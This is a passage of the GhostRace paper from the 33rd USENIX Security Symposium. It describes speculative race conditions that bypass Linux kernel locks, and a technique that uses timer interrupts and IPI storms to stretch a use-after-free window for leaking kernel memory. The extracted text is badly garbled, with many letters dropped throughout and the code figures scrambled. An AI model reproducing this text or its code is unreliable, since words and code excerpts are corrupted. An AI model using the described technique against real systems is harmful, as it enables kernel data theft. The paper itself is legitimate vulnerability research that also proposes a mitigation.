This pape is included in he P oceedings o he
33 d USENIX Secu i y Symposium.
Augus 14–16, 2024 • Philadelphia, PA, USA
978-1-939133-44-1
Open access o he P oceedings o he
33 d USENIX Secu i y Symposium
is sponso ed by USENIX.
Ghos Race: Exploi ing and Mi iga ing
Specula i e Race Condi ions
Hany Ragab, V ije Uni e si ei Ams e dam; And ea Mamb e i and Anil Ku mus,
IBM Resea ch Eu ope - Zu ich; C is iano Giu ida, V ije Uni e si ei Ams e dam
h ps://www.usenix.o g/con e ence/usenixsecu i y24/p esen a ion/ agab
Ghos Race: Exploi ing and Mi iga ing Specula i e Race Condi ions
Hany Ragab†∗
hany. a[email p o ec ed]
And ea Mamb e i∗
amb@zu ich.ibm.com
Anil Ku mus∗
ku @zu ich.ibm.com
C is iano Giu ida†
giu [email p o ec ed]
†V ije Uni e si ei Ams e dam
Ams e dam, The Ne he lands
∗IBM Resea ch Eu ope
Zu ich, Swi ze land
Abs ac
Race condi ions a ise when mul iple h eads a emp o ac-
cess a sha ed esou ce wi hou p ope synch oniza ion, o en
leading o ulne abili ies such as concu en use-a e - ee.
To mi iga e hei occu ence, ope a ing sys ems ely on syn-
ch oniza ion p imi i es such as mu exes, spinlocks, e c.
In his pape , we p esen Ghos Race, he i s secu i y anal-
ysis o hese p imi i es on specula i ely execu ed code pa hs.
Ou key inding is ha all he common synch oniza ion p im-
i i es can be mic oa chi ec u ally bypassed on specula i e
pa hs, u ning all a chi ec u ally ace- ee c i ical egions in o
Specula i e Race Condi ions (SRCs). To s udy he se e i y o
SRCs, we ocus on Specula i e Concu en Use-A e -F ee
(SCUAF) and unco e 1,283 po en ially exploi able gadge s
in he Linux ke nel. Mo eo e , we demons a e ha SCUAF
in o ma ion disclosu e a acks agains he ke nel a e no only
p ac ical, bu ha hei eliabili y can closely ma ch ha o
adi ional Spec e a acks, wi h ou p oo o concep leaking
ke nel memo y a 12 KB/s. C ucially, we de elop a new ech-
nique o c ea e an unbounded ace window, accommoda ing
an a bi a y numbe o SCUAF in oca ions equi ed by an
end- o-end a ack in a single ace window. To add ess he new
a ack su ace, we also p opose a gene ic SRC mi iga ion o
ha den all he a ec ed synch oniza ion p imi i es on Linux.
Ou mi iga ion equi es minimal ke nel changes and incu s
only ≈5% geomean pe o mance o e head on LMBench.
"The e’s secu i y, and hen he e’s jus being idiculous."
– Linus To alds, on Specula i e Race Condi ions
1 In oduc ion
Since he disco e y o Spec e [45], secu i y esea che s ha e
been sc ambling o loca e all he exploi able snippe s o gad-
ge s in ic im so wa e. Pa icula ly insidious is he i s Spec-
e a ian (exploi ing condi ional b anch misp edic ion [45]),
since any ic im code pa h gua ded by a sou ce
i
s a emen
∗This wo k was pa ially done a IBM Resea ch, Zu ich, Swi ze land
may esul in a gadge . To iden i y p ac ical Spec e- 1 gad-
ge s, p e ious esea ch has ocused on specula i e memo y
sa e y ulne abili ies [42,45,53], use-a e - ee [41], and ype
con usion [41]. Howe e , much less a en ion has been de-
o ed o o he classes o (no mally a chi ec u al) so wa e
bugs, such as concu ency bugs.
To a oid (o a leas educe) concu ency bugs, mode n
ope a ing sys ems allow h eads o sa ely access sha ed
memo y by means o synch oniza ion p imi i es, such as
mu exes and spinlocks. In he absence o such p imi i es,
e.g., due o a so wa e bug, c i ical egions would no
be p ope ly gua ded o en o ce mu ual exclusion and
ace condi ions would a ise. While much p io wo k has
ocused on cha ac e izing and acili a ing he a chi ec u al
exploi a ion o ace condi ions [49], e y li le is known
abou hei p e alence on ansien ly execu ed code pa hs. To
shed ligh on he ma e , in his pape we ask he ollowing
esea ch ques ions:
“How do synch oniza ion p imi i es beha e du ing
specula i e execu ion? And wha a e he secu i y implica ions
o mode n ope a ing sys ems?”
To answe hese ques ions, we analyze he implemen a ion
o common synch oniza ion p imi i es in he Linux ke nel.
Ou key inding is ha all he common (w i e-side) p imi-
i es (i) lack explici se ializa ion and (ii) gua d he c i ical
egion wi h a condi ional b anch. As a esul , in an ad e -
sa ial specula i e execu ion en i onmen , i.e., wi h a Spec e
a acke mis aining he condi ional b anch, hese p imi i es
essen ially beha e like a no-op. The secu i y implica ions a e
signi ican , as an a acke can specula i ely execu e all he
c i ical egions in ic im so wa e wi h no synch oniza ion.
Building on his inding, we p esen Ghos Race, he i s
sys ema ic analysis o Specula i e Race Condi ions (SRCs),
a new class o specula i e execu ion ulne abili ies a ec ing
all common synch oniza ion p imi i es. SRCs a e pe asi e,
as an a acke can u n a bi a y (a chi ec u ally) ace- ee
code in o ace condi ions exploi able on a specula i e pa h—
USENIX Associa ion 33 d USENIX Secu i y Symposium 6185
in ac , one o igina ing om he synch oniza ion p imi i es’
condi ional b anch i sel . While he e ec s o SRCs a e no
isible a he a chi ec u al le el (e.g., no c ashes o deadlocks),
due o he ansien na u e o specula i e execu ion, a Spec e
a acke can s ill obse e hei mic oa chi ec u al e ec s ia
side channels. As esul , any SRC b eaking secu i y in a ian s
can ul ima ely lead o Spec e gadge s disclosing ic im da a
o he a acke . To in es iga e he p ac ical secu i y impac o
SRCs, we ocus on Specula i e Concu en Use-A e -F ee
(SCUAF), a subclass o specula i e ace condi ions which con-
ce ns all c i ical egions which, once specula i ely execu ed,
can expose Use-A e -F ee (UAF) ulne abili ies.
To in es iga e he esul ing a ack su ace, we i s p esen
new echniques o exploi SCUAF in p ac ice. SCUAF ex-
ploi a ion ca ies wi h i all he exploi a ion challenges o
Spec e as well as hose o a chi ec u al ace condi ions. The
la e alone is a om i ial, as eliable exploi a ion elies
on con olling and s e ching he ace window o i he ex-
ploi [49]. None heless, a chi ec u al exploi s a e ypically
one-sho , i.e., wi h a single i e a ion o a (e.g., UAF) p imi i e
and hus a single (success ul) ace window. Spec e exploi s,
in u n, ypically equi e housands o millions o i e a ions
o scan memo y looking o he sec e o leak [27]. As such,
wi h exis ing ace window-s e ching echniques [49], we
would need o win he ace an o e whelming numbe o imes,
hinde ing p ac ical exploi a ion. To add ess his challenge,
we p opose a new (a chi ec u al o specula i e) UAF ace
window-massaging echnique o (i) su gically in e up he
ic im h ead a he “ igh ime” and (ii) c ea e an unbounded
window. Ou echnique builds on and ex ends exis ing ime
in e up -based echniques [81] o no only make SCUAF a -
acks ealis ic, bu accommoda e a ull end- o-end specula i e
in o ma ion disclosu e a ack in a single ace window.
Second, o in es iga e he ex en o he p oblem, we p esen
a SCUAF gadge scanne and apply i o he Linux ke nel
o ind 1,283 po en ially ulne able gadge s. By manually
eaching one o ou iden i ied (de ice-speci ic) gadge s, we
implemen a P oo o Concep (PoC) which igge s a con-
cu en UAF on a specula i e pa h o hijack he con ol low
o disclosu e gadge in he ke nel, allowing an unp i ileged
a acke o leak a bi a y ke nel memo y a he a e o 12 KB/s.
Finally, we p esen a mi iga ion o se ialize he execu ion o
all he ulne able synch oniza ion p imi i es. Ou mi iga ion
has gene al applicabili y and can comple ely close he a ack
su ace o no only SCUAF bu SRC in gene al. Mo eo e , i
equi es minimal ke nel changes and incu s low pe o mance
o e head (≈5% geomean on LMBench).
Con ibu ions. We make he ollowing con ibu ions:
1.
We p esen a new exploi a ion echnique o p ecisely
in e up any (ke nel) h ead and c ea e an a chi ec u ally
unbounded UAF exploi a ion window (Sec ion 4.1).
2.
We p esen Specula i e Race Condi ions (SRCs), a new
class o specula i e execu ion ulne abili ies a ec ing
all common synch oniza ion p imi i es (Sec ion 4.2).
3.
We s udy he secu i y implica ions o SRCs on a chi-
ec u ally ace- ee c i ical egions in he Linux ke nel,
demons a ing a P oo o Concep exploi ing a Specu-
la i e Concu en UAF (SCUAF) and leaking a bi a y
ke nel memo y a a a e o 12 KB/s (Sec ion 4.3).
4.
We p opose a gadge scanne o ind 1,283 po en ially
ulne able SCUAF gadge s in he ke nel (Sec ion 5).
5.
We p opose a gene ic mi iga ion o ha den synch oniza-
ion p imi i es agains SRC, wi h a
≈
5% geomean pe -
o mance o e head on LMBench (Sec ion 6).
The PoC code, he gadge scanne , and ad-
di ional in o ma ion a e publicly a ailable a
h ps://www. usec.ne /p ojec s/ghos ace.
2 Backg ound
2.1 T ansien Execu ion
Figu e 1: An example o Spec e bounds check bypass. The
condi ional b anch (in ed) wi h he a acke -con olled
x
spec-
ula i ely bypassing he compa ison wi h
a ay1_size
, he
i s specula i e load eading a sec e by e a add ess
(a ay1
+ x)
(in blue), and he second specula i e load e e encing
he CPU cache wi h a sec e -dependen add ess (in o ange).
Since 2018, a e he disco e y o Spec e [45] and Mel -
down [50], ansien execu ion a acks ha e become an in-
ensi ely s udied a ea o esea ch. Whene e a mode n CPU
implemen s specula i e op imiza ions (e.g., b anch p edic-
ion), i specula i ely execu es a sequence o ins uc ions.
The wo possible ou come o hese ins uc ions a e ha ei-
he hey a e commi ed and made isible o he a chi ec-
u al le el o hey a e squashed due o mispecula ion (e.g.,
misp edic ion)—leading o ansien execu ion. When he in-
s uc ions a e squashed, he CPU ollbacks he s a e. Despi e
he ollback, some mic oa chi ec u al side e ec s a e le and
can be obse ed h ough one o he many side channels a ail-
able (e.g., da a cache [21,29,76,77], b anch a ge bu e [52],
po con en ion [12], e c.) o leak sensi i e in o ma ion.
Spec e-PHT, also known as Spec e- 1, is he i s known
a ack o his kind, a ge ing he pa e n his o y able and ex-
ploi ing a code pa e n such as he one shown in Figu e 1.
As shown in he igu e, he code checks o x o be in-bound
6186 33 d USENIX Secu i y Symposium USENIX Associa ion
be o e pe o ming a double a ay access. Fo exploi a ion
pu poses, he a acke can ensu e xis ou -o -bound and a -
ay1_size is no p esen in he cache. In his scena io, ins ead
o wai ing o a ay1_size o be loaded om main memo y
o pe o m he compa ison, he CPU specula es and s a s o
ansien ly execu e he ins uc ions beyond he compa ison. I
he compa ison has been execu ed se e al imes be o e wi h x
in-bound, he CPU is p one o specula e ha xis once again
in-bound, hence ansien ly pe o ming he ou -o -bound ac-
cess o a ay1. When he
no cached
a ay2 is accessed using
he by e e ie ed om he ou -o -bound access o a ay1, he
speci ic accessed loca ion is loaded in o he cache. The a -
acke can comple e he 1 by e leak by es ing which loca ion
o a ay2 can be accessed as e han he o he s. I s posi ion
wi hin he bu e e eals he sec e by e alue.
No ably, Spec e-PHT emains unmi iga ed in ha dwa e.
So wa e de elope s emain esponsible o ha den po en ially
ulne able b anches wi h mi iga ions (e.g., encing o p e en
specula ion), bu he ex en o which all he “ igh ” b anches
ha e been adequa ely ha dened in la ge high- alue codebases
such as he Linux ke nel emains an open ques ion.
2.2 Concu ency Bugs
Concu ency bugs a e a ca ego y o bugs which a ec mul-
i h eaded p og ams and occu due o he absence o he in-
co ec use o synch oniza ion p imi i es. Due o hei non-
de e minis ic beha io , concu ency bugs a e one o he mos
elusi e and di icul o iage classes o bugs. Unde ce ain
condi ions, concu ency bugs can also lead o memo y e o
ulne abili ies. In mode n ope a ing sys ems such as he Linux
ke nel, one o he mos common memo y e o ulne abili y
caused by concu ency bugs is Use-A e -F ee (UAF).
In a UAF a ack, he i s s ep is gene ally o ee a memo y
objec . This ope a ion in alida es all he poin e s o ha objec ,
which become dangling. The second s ep gene ally in ol es
o cing he alloca o o euse he memo y slo o he ee
objec o he alloca ion o a new objec . This s ep eini ialize
he p e iously eed memo y slo . The inal s ep o he a ack
is gene ally o o ce he ic im o use one o he dangling
poin e s, which now poin s o he newly alloca ed objec . A
ead om o w i e o such poin e o con olled da a can be
used o exploi he bug in a a ie y o ways. An example
illus a ed in Figu e 2 is o ins ance o moun a con ol- low
hijacking a ack ia a dangling unc ion poin e .
When his a ack is pe o med in concu ency se ings, and
he ee s ep and he use s ep a e execu ed by dis inc h eads
sha ing he unde lying objec . Such concu en use-a e - ee
ulne abili y is ha de o exploi han he single- h eaded UAF
case, since exploi a ion depends on h ead in e lea ing and
he a ailabili y o a su icien ace window [49]. While he
communi y has in es ed signi ican e o in in es iga ing a-
di ional concu ency bugs and concu en UAF—e.g., s udies
demons a ing ha mo e han 40% o he UAF ulne abili ies
Figu e 2: Objec ealloca ion in a UAF a ack. Fi s , he ic im
alloca es a heap objec which is subsequen ly eed (s eps 1
and 2). Then, he a acke o ces he alloca ion o an objec
( a _b) eusing memo y slo o he ic im’s objec , aking
con ol o he da a e e enced by he dangling poin e (s ep
3). Finally, he dangling poin e is de e e enced, ul ima ely
allowing he a acke o hijack con ol low (s ep 4).
pa ched in Linux ke nel d i e s a e concu en UAF [9]— hei
mic oa chi ec u al p ope ies ha e la gely been neglec ed. In
his pape , we s udy such p ope ies and hei secu i y implica-
ions o he i s ime, unco e ing a new class o specula i e
execu ion ulne abili ies in he p ocess.
3 De ini ions and Th ea Model
3.1 De ini ions
A adi ional da a ace en ails wo h eads accessing he same
memo y loca ion, wi h one h ead pe o ming a w i e and no
synch oniza ion p imi i e p o ec ing he sha ed accesses. The
da a ace is e e ed o as a ace condi ion when i impac s
he co ec ness o he p og am. We de ine ha a Specula i e
Race Condi ion (SRC) occu s when wo h eads access he
same memo y loca ion, wi h one h ead pe o ming an a chi-
ec u al w i e ope a ion and ano he a ansien access, wi h
an impac on he co ec ness o he specula i ely execu ed
p og am. In ui i ely, he synch oniza ion p imi i e, such as
exclusi e locking, can be bypassed by one o he wo h eads
due o specula i e execu ion. Due o hei secu i y impac , we
speci ically ocus on Specula i e Concu en Use-A e -F ee
(SCUAF), he SRC equi alen o adi ional concu en use -
a e - ee [49]. In ui i ely, because concu en use-a e - ees
a e o en escala ed o con ol- low hijacking [49], SCUAFs
a e also likely o be escala ed o specula i ely con ol- low
hijacking, a powe ul specula i e execu ion p imi i e [45].
USENIX Associa ion 33 d USENIX Secu i y Symposium 6187
s uc n c_hci_de {
}
s uc mu ex msg_ x_mu ex;
s uc hci_msg* cmd_pending_msg;
...
...
... s uc hci_msg {
}
oid (*cb)(...);
...
...
oid *cb_con ex ;
SHARED DATA
THREAD 2THREAD 1
C3
C1
C2
n c_hci_msg_ x_wo k(hde ){
...
mu ex_lock(&hde ->msg_ x_mu ex);
i (hde ->cmd_pending_msg->cb){
hde ->cmd_pending_msg->cb(
hde ->cmd_pending_msg->
cb_con ex , NULL, -ETIME);
}
k ee(hde ->cmd_pending_msg);
hde ->cmd_pending_msg = NULL;
...
mu ex_unlock(&hde ->msg_ x_mu ex);
}
n c_hci_msg_ x_wo k(hde ){
...
mu ex_lock(&hde ->msg_ x_mu ex);
i (hde ->cmd_pending_msg->cb){
hde ->cmd_pending_msg->cb(
hde ->cmd_pending_msg->
cb_con ex , NULL, -ETIME);
}
k ee(hde ->cmd_pending_msg);
hde ->cmd_pending_msg = NULL;
...
mu ex_unlock(&hde ->msg_ x_mu ex);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
Figu e 3: The NFC gadge (
ne /n c/hci/co e.c:78
)
ound by ou scanne and he h ee main challenges o moun
an end- o-end Ghos Race a ack.
3.2 Th ea Model
We conside a ypical c oss-domain Spec e h ea model, wi h
a local unp i ileged a acke able o issue sys em calls o he
ic im ke nel. The a acke seeks o leak a bi a y ke nel da a
by exploi ing a specula i e ace condi ion in an o he wise
a chi ec u ally- ace- ee c i ical egion in he ke nel. We as-
sume s a e-o - he-a mi iga ions agains ansien execu ion
a acks a e all enabled and o he classes o (e.g., so wa e)
bugs a e ou o scope— o ins ance, subjec o o hogonal mi -
iga ions. He ea e , wi hou loss o gene ali y, we speci ically
ocus on he Linux ke nel unning on In el x86-64.
4 Ghos Race A acks
The goal o a Ghos Race a ack is o disclose a bi a y ke -
nel da a by exploi ing a specula i e ace condi ion in an
o he wise a chi ec u ally ace- ee c i ical egion. To illus-
a e he wo kings o an a ack, we use one o he gad-
ge s ound in Linux ke nel 5.15.83 by ou gadge scanne
(
ne /n c/hci/co e.c:78
) as a unning example. Figu e 3
depic s wo h eads bo h execu ing he gadge , a he co e o
he
n c_hci_msg_ x_wo k
unc ion. Such unc ion se es
as pa o he implemen a ion o he Hos Con olle In e -
ace (HCI) laye o he Nea Field Communica ion (NFC)
d i e co e o he Linux ke nel and p ocesses pending mes-
sages o he NFC de ice. As we do no ha e he equi ed
NFC ha dwa e o na i ely execu e his unc ion, we added
a sys em call o each his code pa h du ing ou analysis.
The unc ion con ains a c i ical egion (i.e., ou gadge ) op-
e a ing on he
n c_hci_de hde
de ice and pe o ming
he ollowing ope a ions. Fi s , i locks he
msg_ x_mu ex
mu ex o gain exclusi e access o he de ice and en e
he c i ical egion. Second, i checks whe he he pending
hci_msg hde ->cmd_pending_msg
command message o
p ocess has a callback se . I so, he callback is in oked ia
he
hde ->cmd_pending_msg->cb
unc ion poin e . Thi d,
i ees he memo y backing he command message and se s
he now-dangling
hde ->cmd_pending_msg
poin e o
NULL
.
Las ly, i exi s he c i ical egion by eleasing he mu ex.
Since he c i ical egion can be concu en ly accessed
by di e en use p ocesses/ h eads sha ing he NFC de-
ice, i is c ucial o he mu ex o gua d he egion, en-
o cing mu ually exclusi e access o he de ice and ul-
ing ou any ace condi ions. Indeed, absen he mu ex,
he code in ques ion would be ulne able o a concu -
en Use-A e -F ee (UAF) ulne abili y: as Th ead 1 exe-
cu es F ee code (in bold g een), be ween he
k ee
o he
hde ->cmd_pending_msg
poin e and he
NULL
upda e o
he poin e , Th ead 2 may execu e he Use code (in bold
ed) and in oke he
hde ->cmd_pending_msg->cb
callback
o he pending message which was jus eed. An a acke
able o con ol memo y euse can hen igge he Use wi h
a con olled callback alue and escala e he ulne abili y o
con ol- low hijacking. Luckily, hanks o mu exes and o he
synch oniza ion p imi i es o e ed by mode n ope a ing sys-
ems such as he Linux ke nel (spin locks, RW locks, e c.),
a chi ec u al exploi a ion o such ace- ee code is in easible.
Un o una ely, as we will show, he same does no apply
in he specula i e domain, whe e a chi ec u ally ace- ee ex-
ecu ion can s ill be (mic oa chi ec u ally) subjec o SRCs.
Speci ically, in ou Ghos Race a ack, we exploi he NFC
gadge o c a a SCUAF p imi i e and ul ima ely disclose
da a, wi h Th ead 1 a chi ec u ally execu ing i s c i ical e-
gion, i.e., a chi ec u al F ee, and Th ead 2 concu en ly being
specula i ely execu ed i.e., specula i e Use. Mo eo e , we
need o ensu e ha Th ead 1 is in e up ed immedia ely a -
e he F ee, wi h a su icien ly la ge ace window (o UAF
exploi a ion window) o p ac ical exploi a ion. Finally, we
need o e ec ou SCUAF p imi i e se e al imes o moun
end- o-end specula i e in o ma ion disclosu e a acks.
In o he wo ds, o moun Ghos Race a acks, we need o
add ess he ollowing challenges highligh ed in Figu e 3:
C1
C ea e a la ge, ideally unbounded, a chi ec u al UAF
exploi a ion window be ween
k ee
and he
NULL
hde ->cmd_pending_msg
poin e upda e o accommo-
da e as many SCUAF p imi i e in oca ions as possible.
C2
Tu n ou a chi ec u ally ace- ee gadge in o a
specula i e ace condi ion, c a ing a SCUAF p im-
i i e specula i ely de e e encing he (dangling)
hde ->cmd_pending_msg->cb unc ion poin e .
C3
Use he building blocks abo e o moun end- o-end in-
o ma ion disclosu e a acks agains he ke nel.
4.1 C ea ing an Unbounded UAF Window
To add ess
C1
, we need a s a egy o in e up an a bi a y
h ead in he Linux ke nel o a la ge and ideally unbounded
6188 33 d USENIX Secu i y Symposium USENIX Associa ion
Figu e 4: F om eigh ins uc ions-wide o unbounded a chi ec u al Use-A e -F ee exploi a ion window. S eps 1 and 6 un in
use mode, issuing syscalls o igge he ele an ke nel code. The o he s eps un in ke nel mode.
pe iod o ime. We can hen use his s a egy o c ea e an a -
chi ec u al unbounded UAF window in he ic im Th ead
1 o he a acke Th ead 2 o exploi . Ou case s udy is
pa icula ly challenging as he “o iginal” UAF exploi a ion
window is e y small: he a acke mus be able o use he
hde ->cmd_pending_msg
poin e (a line 5 in Th ead 2) a -
e he
hci_msg
memo y objec is eed (line 9 in Th ead 1)
and be o e he poin e is nulli ied (line 10 in Th ead 1). In
o he wo ds, he ime be ween
k ee
eeing he objec and
he
NULL
upda e o he
hde ->cmd_pending_msg
poin e is
he only span Th ead 2 could exploi o c a a UAF p imi i e.
A Tiny Window. To p ecisely quan i y he o iginal UAF
exploi a ion window, one can inspec he implemen a ion
o
k ee
. As shown in Figu e 4, unde he hood, he
de aul (
__slab_ ee
) implemen a ion ees he objec
(
lis _del
) and hen eleases an in e up -sa e spinlock
(
_ aw_spin_unlock_i q es o e
) immedia ely be o e e-
u ning con ol o he calle . Since such spinlock uns wi h
in e up s disabled (i.e., he CPU canno be in e up ed), he
o iginal (in e up ible) UAF exploi a ion window is as iny
as eigh ins uc ions—accoun ing o he ime be ween spin-
lock elease and he
NULL
poin e upda e a line 10. To s e ch
such a iny window, we can build on exis ing in e up -d i en
echniques [49,81]. None heless, his is challenging as such
echniques we e no designed o p oduce ace windows ha
would eliably accommoda e se e al UAF in oca ions. Mo e-
o e , o he echniques elying on a high-p io i y use h ead
o p eemp he ic im ke nel execu ion [34] a e no applicable
o s ock ke nels, which un wi h p eemp ion o by de aul
(i.e., CONFIG_PREEMPT unse ).
F om Tiny o Unbounded. To add ess hese issues, we
p opose a new s a egy based on a combina ion o echniques.
Fi s , d awing om he ime d-based echnique p oposed
in [81], we ely on high-p ecision ha dwa e ime s [26] o
in e up he ic im h ead a he igh ime and sligh ly am-
pli y he o iginal UAF window. No e ha , in ou se ing, he
o iginal ime d-based echnique [81] becomes mo e e ec-
i e, since we can exploi he in e up -disabled beha io o
k ee
o mo e p ecisely in e up he ic im h ead a he igh
ime. Second, we ely on use in e aces o igge an (in e -
p ocesso ) in e up (IPI)s o m o (less p ecisely) in e up
he ic im h ead in he ampli ied window and s e ch such
window inde ini ely. This is possible since he ic im CPU
is s uck handling IPIs un il he a acke so wishes. Figu e 4
illus a es he s eps o ou s a egy.
As shown in he igu e, he a ack s a s wi h
1
he a -
acke scheduling a high-p ecision ha dwa e ime [26] on
a ic im co e. The a acke calib a es he ime o expi e a
some poin in he u u e, a nanosecond esolu ion. Nex ,
2
he a acke s a s a ic im (i.e., F ee) h ead on he same
co e, which issues a sys em call o each he a ge gadge and
hus he ic im
k ee
in oca ion. Nex ,
3k ee
acqui es
he in e up -sa e spinlock and comple es he eeing o he
ic im memo y objec wi hin unin e up ible execu ion. Nex ,
4k ee
eleases he spinlock and esumes in e up ible ex-
ecu ion. A his poin , as long as he ime al eady expi ed
du ing unin e up ible execu ion,
5
he ic im ge s immedi-
a ely in e up ed a he s a o he in e up ible UAF window.
Indeed, when he ime expi es, he ha dwa e aises an in e -
up , bu i s ac ual deli e y ge s delayed un il in e up s a e
enabled again (i.e., upon spinlock elease). In o he wo ds,
USENIX Associa ion 33 d USENIX Secu i y Symposium 6189
Figu e 5: Size o he UAF exploi a ion window s. numbe o
IPI s o ming co es a ge ing he ic im co e. The size o he ex-
ploi a ion window is measu ed in numbe o
ge pid
syscalls
(a s anda d benchma k o e alua e gene ic ound ips o he
ke nel [11]) ha a acke s can un be o e he ic im co e han-
dles all incoming
memba ie
IPIs and upda es he dangling
hde ->cmd_pending_msg
poin e o
NULL
. The expe imen
is pe o med on a commodi y clien In el 12 h-gene a ion
i9-12900K CPU, which has 16 co es and 24 Simul aneous
Mul i h eads (SMTs). We obse e ha only 15 SMTs a e
su icien o ob ain an unbounded UAF exploi a ion window.
We also obse e ha he loca ion o he IPI s o ming co es
ma e s [23,57], as he physically close a s o ming co e is o
he ic im co e, he highe he IPI h oughpu due o he lowe
la ency on he in e connec . This explains he big inc ease
om 10 o 12 and om 12 o 15 SMTs as he s o ming co es
added in bo h expe imen s we e physically he closes o he
ic im co e among all a ailable co es.
e en wi h imp ecise ime calib a ion o ji e , he a acke
has signi ican chances o in e up he ic im a p ecisely
he igh ime. I is, in ac , su icien o cause he ime o
expi e any ime wi hin he co e (unin e up ible) execu ion o
k ee
, a he han in he o iginal iny eigh -ins uc ion UAF
window. Pu di e en ly, he in e up -disabled beha io o
k ee ul ima ely helps a he han hinde s he a ack.
When he ime in e up ge s deli e ed, ke nel execu-
ion swi ches om he ic im h ead o he ime in e up
handle . The la e no mally is sho -li ed, bu one can am-
pli y he window by egis e ing se e al ime obse e s, e.g.,
ia
ime d
suppo . S ill, while his s a egy can in e -
up he ic im h ead a he igh ime and ampli y he
o iginal UAF window, he la e is s ill insu icien o ac-
commoda e many SCUAF p imi i e in oca ions. Howe e ,
he ampli ied window is su icien o he a acke o in e -
up he ime in e up handle wi h a mo e ji e y In e -
P ocesso In e up (IPI) sen by ano he co e. Building on
his in ui ion,
6
he a acke schedules on he emaining
co es s o ming h eads ha cons an ly send IPIs o he ic-
im co e. Fo his pu pose, he
memba ie
sys em call
oid mu ex_lock(s uc mu ex *lock){
1...
2
6...
7}
3i (!__mu ex_ ylock_ as (lock))
4i (a omic_long_ y_cmpxchg_acqui e(&lock, ...))
5 e u n ue;
);
})
__ aw_ y_cmpxchg(p , ...)({
: "memo y"
asm ola ile(
"lock cmpxchgq %2, %1"
: "=a" ( e ), "+m" (*p )
: " " (new), "0" (old)
a ch_a omic_long_ y_cmpxchg_acqui e(&lock, , ...)
a ch_a omic_ y_cmpxchg_acqui e(&lock, , ...)
a ch_a omic_ y_cmpxchg(&lock, , ...)
a ch_ y_cmpxchg((&lock, , ...)
a omic_long_ y_cmpxchg_acqui e(&lock, ...)
Call S ack:
Figu e 6: Top pa : The co e implemen a ion o he
mu ex_lock
synch oniza ion p imi i e, wi h he condi ional
b anch which can be abused o c a SRCs in ed. Bo om
pa : The b anch ul ima ely checks he ou come o he
lock
cmpxchgq
ins uc ion which does no se ialize he execu ion.
MEMBARRIER_CMD_PRIVATE_EXPEDITED_RSEQ
IPI is ideal,
since, unlike o he IPIs used by p e ious wo k [49], i s deli -
e y can be igge ed ia a low-la ency sys em call a ge ing a
single ( ic im) co e. The esul ing IPI s o m no only causes
he ime in e up handle o be in e up ed, bu comple ely
o e whelms he ic im co e. Figu e 5 ela es he size o he
UAF exploi a ion window o an inc easing numbe o s o m-
ing co es on ou es pla o m, wi h 15 SMTs being su icien
o o e whelm he ic im. Indeed,
7
he ic im co e is o ced
o cons an ly handle an inde ini e numbe o
MEMBARRIER
IPIs, e ec i ely c ea ing an a chi ec u al unbounded UAF
exploi a ion window o moun an a bi a ily long end- o-end
a ack. Finally, once he a ack comple es, he a acke e -
mina es he s o ming h eads,
8
ic im h ead execu ion e-
sumes, and only hen he dangling
hde ->cmd_pending_msg
poin e is upda ed o
NULL
. No e ha , be ween s eps
7
and
8
, he a acke may execu e a specula i e execu ion a ack as
many imes as hey wish, gi en he unbounded window. This
means he s eps
1
o
8
he e o c ea ing he unbounded ex-
ploi a ion window only need o succeed once o he a acke
o be able o leak as many by es as desi ed.
4.2 C a ing Specula i e Race Condi ions
To add ess
C2
and c a specula i e ace condi ions, we u n
o he implemen a ion o common synch oniza ion p imi i es
(e.g., mu ex,spinlock, e c.). A he a chi ec u al le el, hese
p imi i es gua an ee mu ual exclusion o c i ical egions and
his is no di e en o ou gadge . Howe e , hey o e no
6190 33 d USENIX Secu i y Symposium USENIX Associa ion
Figu e 7: T ansien window size o di e en w i e-side syn-
ch oniza ion mechanisms, i.e., numbe o specula i e loads
ha lea e an obse able mic oa chi ec u al ace.
mic oa chi ec u al gua an ees and hei beha io is subjec
o hei implemen a ion. To unde s and hei beha io , we
in es iga ed he implemen a ion o common synch oniza ion
p imi i es in he Linux ke nel. The co e implemen a ion o
he mu ex_lock p imi i e (Figu e 6 op) se es o illus a e.
As shown in he igu e, line 4 includes a condi ional b anch
ha ul ima ely checks he ou come o he
lock cmpxchgq
ins uc ion. Such ins uc ion a omically compa es he cu en
alue o he mu ex
p
wi h i s old one
old
, and, i iden ical,
i means ha he mu ex can be locked—se ing he mu ex o
he new alue
new
and g an ing access o he gua ded c i ical
egion. Likewise, i he compa ison ails, i means ha he
mu ex has been locked by ano he h ead, he e o e he code
alls h ough a e ailing o acqui e he mu ex.
Al hough he compa ison is done a omically, he ins uc-
ion (as we expe imen ally e i ied) does no se ialize he
execu ion s eam. As a esul , we can mis ain he condi ional
b anch a line 4 (e.g., simply by acqui ing he mu ex mul iple
imes) o be aken and consis en ly ick specula i e execu-
ion in o acqui ing a mu ex and en e ing he gua ded c i ical
egion. Since his is he case ega dless o he cu en (a -
chi ec u al) s a e o he mu ex, we can specula i ely acqui e
a mu ex al eady held by ano he h ead. In o he wo ds, he
mu ex becomes a no-op on he specula i e pa h, leading o a
specula i e ace condi ion and opening he doo o a bi a y
concu ency ulne abili ies a he mic oa chi ec u al le el.
Gene alizing, ou analysis shows all he o he common
w i e-side synch oniza ion p imi i es in he Linux ke nel a e
ul ima ely implemen ed h ough a condi ional b anch and
a e he e o e ulne able o specula i e ace condi ions. To
expe imen ally con i m his in ui ion, we es ed all such syn-
ch oniza ion p imi i es unde specula i e execu ion a e mis-
aining he ulne able b anch. In all cases, we con i med
ansien execu ion o he gua ded c i ical egion despi e an-
o he ic im h ead al eady a chi ec u ally execu ing in he
egion. To de e mine he ansien window size, we measu ed
he maximum numbe o specula i e load ins uc ions we
could specula i ely execu e inside he c i ical egion.
Figu e 7 p esen s ou esul s o wo mic oa chi ec u es
(In el Co e i9-13900K and AMD Ryzen 9 5950X) and wo
con igu a ions: (i) a acke and ic im h ead co-loca ed on
he same co e; (ii) a acke and ic im h ead unning on di -
e en co es. As shown in he igu e, he ansien window
size is signi ican ac oss se ings (20+ loads). Mo eo e , he
window is usually la ge when he wo h eads a e unning
ac oss co es, e idencing ha he cache cohe ency p o ocol
plays a c ucial ole in p opaga ing he lock a chi ec u al s a e
ac oss co es be o e specula ion abo s. Finally, ou esul s
show some a ia ions ac oss mic oa chi ec u es. Fo ins ance,
he AMD p ocesso has a longe specula ion window han he
In el one, ma ching ends om p io wo k [61]. O e all, ou
esul s show an a acke can specula i ely bypass all he com-
mon (w i e-side) synch oniza ion p imi i es and c a specu-
la i e ace condi ions, u ning e e y (a chi ec u ally ace- ee)
c i ical egion in o a po en ial gene ic Spec e gadge .
